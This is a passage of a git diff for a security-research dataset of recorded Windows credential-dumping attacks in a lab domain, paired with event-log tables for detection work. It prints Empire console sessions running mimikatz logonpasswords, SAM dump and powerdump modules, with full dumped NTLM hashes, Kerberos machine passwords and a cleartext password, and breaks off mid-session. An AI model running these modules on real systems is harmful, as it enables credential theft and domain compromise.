PipeEvent) | 57 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 24 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 14 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 436 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 147 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 140 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 102 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2426 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | -| Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 1735 | -## Empire Activity +## Attacker Activity ``` -usemodule credentials/mimikatz/logonpasswords* -execute -``` - -``` -[*] Tasked 8BLV6USC to run TASK_CMD_JOB -[*] Agent 8BLV6USC tasked with task ID 2 -[*] Tasked agent 8BLV6USC to run module powershell/credentials/mimikatz/logonpasswords -(Empire: powershell/credentials/mimikatz/logonpasswords) > Job started: CD6AR8 -Hostname: IT001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 +(Empire: TKV35P8X) > usemodule credentials/mimikatz/logonpasswords* +(Empire: powershell/credentials/mimikatz/logonpasswords) > info + + Name: Invoke-Mimikatz DumpCreds + Module: powershell/credentials/mimikatz/logonpasswords + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + plaintext credentials from memory. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/mimikatz/logonpasswords) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 17 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/logonpasswords +(Empire: powershell/credentials/mimikatz/logonpasswords) > Job started: TS8ARN +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** @@ -77,183 +103,60 @@ Hostname: IT001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 mimikatz(powershell) # sekurlsa::logonpasswords -Authentication Id : 0 ; 84172714 (00000000:05045faa) -Session : Interactive from 2 -User Name : Mmidge -Domain : SHIRE -Logon Server : HFDC01 -Logon Time : 3/19/2019 11:40:04 AM -SID : S-1-5-21-2511471446-1103646877-3980648787-1119 - msv : - [00000003] Primary - * Username : Mmidge - * Domain : SHIRE - * NTLM : b415baa073a14f81f8c89a2a384f4a68 - * SHA1 : 85e07a118d7d6f0841ae1fa5061e4bbdfa24d3a7 - * DPAPI : 9375ed71838555731c26915707be9807 - tspkg : - wdigest : - * Username : Mmidge - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : Mmidge - * Domain : SHIRE.COM - * Password : (null) - ssp : - credman : - -Authentication Id : 0 ; 84172686 (00000000:05045f8e) -Session : Interactive from 2 -User Name : Mmidge -Domain : SHIRE -Logon Server : HFDC01 -Logon Time : 3/19/2019 11:40:04 AM -SID : S-1-5-21-2511471446-1103646877-3980648787-1119 - msv : - [00000003] Primary - * Username : Mmidge - * Domain : SHIRE - * NTLM : b415baa073a14f81f8c89a2a384f4a68 - * SHA1 : 85e07a118d7d6f0841ae1fa5061e4bbdfa24d3a7 - * DPAPI : 9375ed71838555731c26915707be9807 - tspkg : - wdigest : - * Username : Mmidge - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : Mmidge - * Domain : SHIRE.COM - * Password : (null) - ssp : - credman : - -Authentication Id : 0 ; 84135757 (00000000:0503cf4d) -Session : Interactive from 2 -User Name : DWM-2 -Domain : Window Manager -Logon Server : (null) -Logon Time : 3/19/2019 11:39:48 AM -SID : S-1-5-90-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 84135694 (00000000:0503cf0e) -Session : Interactive from 2 -User Name : DWM-2 -Domain : Window Manager -Logon Server : (null) -Logon Time : 3/19/2019 11:39:48 AM -SID : S-1-5-90-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 84132167 (00000000:0503c147) -Session : Interactive from 2 -User Name : UMFD-2 -Domain : Font Driver Host -Logon Server : (null) -Logon Time : 3/19/2019 11:39:47 AM -SID : S-1-5-96-0-2 - msv : - [00000003] Primary - * Username : IT001$ - * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 - tspkg : - wdigest : - * Username : IT001$ - * Domain : SHIRE - * Password : (null) - kerberos : - * Username : IT001$ - * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ - ssp : - credman : - -Authentication Id : 0 ; 1804514 (00000000:001b88e2) +Authentication Id : 0 ; 789700 (00000000:000c0cc4) Session : Interactive from 1 -User Name : pgustavo +User Name : nmartha Domain : SHIRE Logon Server : HFDC01 -Logon Time : 3/11/2019 10:14:23 PM -SID : S-1-5-21-2511471446-1103646877-3980648787-1107 +Logon Time : 5/14/2019 12:02:02 PM +SID : S-1-5-21-2511471446-1103646877-3980648787-1106 msv : [00000003] Primary - * Username : pgustavo + * Username : nmartha * Domain : SHIRE - * NTLM : 8ece039f32592670b45fc801e2a9157d - * SHA1 : ba22a71f7aa370d915a51f3c30fc561b8ea4b95f - * DPAPI : fd5b6f36bea3f6757701cb443a46219f + * NTLM : 65f55a917b232dc6bb8e93872e458326 + * SHA1 : 19ed298d7b3d2c58918ebc0f4670cff5a1020d9e + * DPAPI : e28a4a7bea1950d9558f1e3a4662302a tspkg : wdigest : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE * Password : (null) kerberos : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE.COM * Password : (null) ssp : credman : -Authentication Id : 0 ; 1804488 (00000000:001b88c8) +Authentication Id : 0 ; 789663 (00000000:000c0c9f) Session : Interactive from 1 -User Name : pgustavo +User Name : nmartha Domain : SHIRE Logon Server : HFDC01 -Logon Time : 3/11/2019 10:14:23 PM -SID : S-1-5-21-2511471446-1103646877-3980648787-1107 +Logon Time : 5/14/2019 12:02:02 PM +SID : S-1-5-21-2511471446-1103646877-3980648787-1106 msv : [00000003] Primary - * Username : pgustavo + * Username : nmartha * Domain : SHIRE - * NTLM : 8ece039f32592670b45fc801e2a9157d - * SHA1 : ba22a71f7aa370d915a51f3c30fc561b8ea4b95f - * DPAPI : fd5b6f36bea3f6757701cb443a46219f + * NTLM : 65f55a917b232dc6bb8e93872e458326 + * SHA1 : 19ed298d7b3d2c58918ebc0f4670cff5a1020d9e + * DPAPI : e28a4a7bea1950d9558f1e3a4662302a tspkg : wdigest : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE * Password : (null) kerberos : - * Username : pgustavo + * Username : nmartha * Domain : SHIRE.COM * Password : (null) ssp : + [00000000] + * Username : pgustavo + * Domain : shire + * Password : W1n1!19 credman : Authentication Id : 0 ; 997 (00000000:000003e5) @@ -261,7 +164,7 @@ Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) -Logon Time : 3/11/2019 9:00:04 PM +Logon Time : 5/3/2019 3:14:44 AM SID : S-1-5-19 msv : tspkg : @@ -276,144 +179,144 @@ SID : S-1-5-19 ssp : credman : -Authentication Id : 0 ; 63616 (00000000:0000f880) +Authentication Id : 0 ; 63941 (00000000:0000f9c5) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) -Logon Time : 3/11/2019 8:58:33 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-90-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 63559 (00000000:0000f847) +Authentication Id : 0 ; 62725 (00000000:0000f505) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) -Logon Time : 3/11/2019 8:58:33 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-90-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 -User Name : IT001$ +User Name : HR001$ Domain : SHIRE Logon Server : (null) -Logon Time : 3/11/2019 8:58:17 PM +Logon Time : 5/3/2019 3:14:43 AM SID : S-1-5-20 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : it001$ + * Username : hr001$ * Domain : SHIRE.COM * Password : (null) ssp : credman : -Authentication Id : 0 ; 40805 (00000000:00009f65) +Authentication Id : 0 ; 39974 (00000000:00009c26) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) -Logon Time : 3/11/2019 8:58:04 PM +Logon Time : 5/3/2019 3:14:41 AM SID : S-1-5-96-0-0 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 40613 (00000000:00009ea5) +Authentication Id : 0 ; 39911 (00000000:00009be7) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) -Logon Time : 3/11/2019 8:58:04 PM +Logon Time : 5/3/2019 3:14:41 AM SID : S-1-5-96-0-1 msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : IT001$ + * Username : HR001$ * Domain : shire.com - * Password : dFK-5\;zQ5LfJu.+,?sywo9AfG;g_z0'bfgx1Ce]^lNE&mZS;B-OEKK^1[E]+4bKA$WgCj 0f.*bhGdg=0KeSK' H*VY9l!@4ooDV$]$2yM`j/jXEKCp]KMZ + * Password : u5@ORs;+(&[JsT@`r"_.W/y&:$>QTXx!\xN_$ppX8vj<35*wQHd[jsX4p$,aEyI3n12O EJe)Mv5?R90uf6N+PdMFV6=s`&fa>mpm[FP$+toFL?`pWRygP8j ssp : credman : -Authentication Id : 0 ; 39288 (00000000:00009978) +Authentication Id : 0 ; 37663 (00000000:0000931f) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) -Logon Time : 3/11/2019 8:57:53 PM +Logon Time : 5/3/2019 3:14:40 AM SID : msv : [00000003] Primary - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE - * NTLM : 5c03a8bf5d1c76899fbd1ee4178574b8 - * SHA1 : 1bafcdcc855ae86e06ac39b278243a7990dcb493 + * NTLM : 7db15a1083d24df4e5b82a0de8ba60f7 + * SHA1 : 11d7f7530035b95306ac0b9f24d29e85bed0fd13 tspkg : wdigest : kerberos : @@ -422,19 +325,19 @@ SID : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 -User Name : IT001$ +User Name : HR001$ Domain : SHIRE Logon Server : (null) -Logon Time : 3/11/2019 8:57:43 PM +Logon Time : 5/3/2019 3:14:40 AM SID : S-1-5-18 msv : tspkg : wdigest : - * Username : IT001$ + * Username : HR001$ * Domain : SHIRE * Password : (null) kerberos : - * Username : it001$ + * Username : hr001$ * Domain : SHIRE.COM * Password : (null) ssp : diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz index bbcca86c..0ea39a26 100644 Binary files a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md index 224810a8..46405eec 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/README.md @@ -5,6 +5,8 @@ An adversary with enough privileges can access credentials from the contents of ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_reg_dump_sam](./empire_reg_dump_sam.md) | 2019-03-01174830 | \ No newline at end of file +| Network | Dataset | Updated | +| ----------- | ------- | --------- | +| shire | [empire_reg_dump_sam](./empire_reg_dump_sam.md) | 2019-03-01174830 | +| shire | [empire_powerdump](./empire_powerdump.md) | 2019-05-18225051 | +| shire | [empire_mimikatz_lsadump](./empire_mimikatz_lsadump.md) | 2019-05-18202513 | \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md new file mode 100644 index 00000000..7b65159e --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.md @@ -0,0 +1,143 @@ +# Empire LSA SAM Dump + +PowerSploit's Invoke-Mimikatz function to extract hashes from the Security Account Managers (SAM) database + +## Technique(s) ID + +T1003 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_lsadump.tar.gz](./empire_mimikatz_lsadump.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18202513 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 3336 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 7687 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 179 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 10 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 7 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 32757 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 99 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 79 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 67 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 31 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 3774 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/mimikatz/sam* +(Empire: powershell/credentials/mimikatz/sam) > info + + Name: Invoke-Mimikatz SAM dump + Module: powershell/credentials/mimikatz/sam + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + hashes from the Security Account Managers (SAM) database. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt + ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls + a + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/mimikatz/sam) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 19 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/sam +(Empire: powershell/credentials/mimikatz/sam) > Job started: 4CDAY8 +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # token::elevate +Token Id : 0 +User name : +SID name : NT AUTHORITY\SYSTEM + +508 {0;000003e7} 1 D 32920 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary + -> Impersonated ! + * Process Token : {0;000c0c9f} 1 F 29726105 SHIRE\nmartha S-1-5-21-2511471446-1103646877-3980648787-1106 (12g,23p) Primary + * Thread Token : {0;000003e7} 1 D 34211255 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) + +mimikatz(powershell) # lsadump::sam +Domain : HR001 +SysKey : c7bc124448d3851819e68f8c2c199c2f +Local SID : S-1-5-21-3594478387-3513325568-2589039918 + +SAMKey : 8b66c564e175f6a7c0c40bc70f65144f + +RID : 000001f4 (500) +User : Administrator + +RID : 000001f5 (501) +User : Guest + +RID : 000001f7 (503) +User : DefaultAccount + +RID : 000001f8 (504) +User : WDAGUtilityAccount + Hash NTLM: 63a935cccb1d1be6c4011ec2a68f1a95 + +RID : 000003e9 (1001) +User : Nora + Hash NTLM: f9558f5eff6314996c96ec2c3800d3f0 + +mimikatz(powershell) # token::revert + * Process Token : {0;000c0c9f} 1 F 29726105 SHIRE\nmartha S-1-5-21-2511471446-1103646877-3980648787-1106 (12g,23p) Primary + * Thread Token : no token + ``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz new file mode 100644 index 00000000..14728f8a Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_mimikatz_lsadump.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md new file mode 100644 index 00000000..8138f129 --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.md @@ -0,0 +1,118 @@ +# Empire Powerdump + +Dumping hashes from HKLM:\SAM\SAM\Domains\ registry keys. + +## Technique(s) ID + +T1003 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_powerdump.tar.gz](./empire_powerdump.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18225051 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 382 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 109 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 66 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 20 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 7 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 3 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 206 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 182 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 98 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 66 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 38 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 17 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 323 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/powerdump* +(Empire: powershell/credentials/powerdump) > info + + Name: Invoke-PowerDump + Module: powershell/credentials/powerdump + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + DarkOperator + winfang + Kathy Peters + ReL1K + +Description: + Dumps hashes from the local system using Posh-SecMod's + Invoke-PowerDump + +Comments: + https://github.com/darkoperator/Posh- + SecMod/blob/master/PostExploitation/PostExploitation.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/powerdump) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 34 +[*] Tasked agent 